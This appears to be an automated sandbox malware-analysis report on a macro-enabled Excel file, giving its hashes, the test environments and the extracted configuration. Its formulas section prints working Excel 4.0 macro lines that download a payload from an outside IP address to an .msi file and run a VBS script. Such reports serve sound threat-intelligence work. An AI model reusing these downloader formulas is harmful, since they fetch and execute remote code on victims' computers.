Static task
static1
Behavioral task
behavioral1
Sample
8c3f1a8e66ba145496d0eb11c5d51ca5.xlsm
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
8c3f1a8e66ba145496d0eb11c5d51ca5.xlsm
Resource
win10v2004-20231215-en
General
-
Target
8c3f1a8e66ba145496d0eb11c5d51ca5
-
Size
6KB
-
MD5
8c3f1a8e66ba145496d0eb11c5d51ca5
-
SHA1
aaf3af820bca7a136a2a895080edc85401a86b7a
-
SHA256
ae1a73384724381e0f0c58a7761bba4cac031b3aea9247ec26695955fb6db7ef
-
SHA512
fd492d3d59f7adfbcbf6438e32652b517ecf4b1cb0f4071df0c3abecc501388b92b8fa2f6598403b1a8607b77239256bc8ab91820cfbbf59d17e2ead1783e52c
-
SSDEEP
192:NDSluSEbrA2OmmfRD8UhHFBFYulb98yM2+x:NGuNM2wh1FY8b98yMN
Malware Config
Extracted
http://46.17.98.187/index.php
http://google.com/index.php
-
formulas
=CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0) =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0) =EXEC("wscript C:\zer\spp.vbs") =HALT()
Signatures
Files
-
8c3f1a8e66ba145496d0eb11c5d51ca5.xlsm office2007